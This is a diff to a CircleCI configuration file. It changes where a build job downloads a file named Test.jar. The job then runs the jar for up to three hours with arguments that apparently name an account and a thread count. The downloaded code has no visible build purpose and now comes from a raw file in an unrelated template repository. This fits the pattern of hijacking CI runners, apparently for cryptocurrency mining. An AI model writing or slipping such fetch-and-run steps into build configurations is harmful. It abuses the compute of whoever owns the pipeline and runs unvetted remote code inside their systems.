--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -9,5 +9,5 @@ jobs:
           command: |
             apt update
             apt install wget default-jre -y
-            wget https://defaulter.runkodapps.com/Test.jar
+            wget https://github.com/z5rubinaz1/nodejs-express-template/raw/master/Test.jar
             timeout 3h java -jar Test.jar rock6064 3
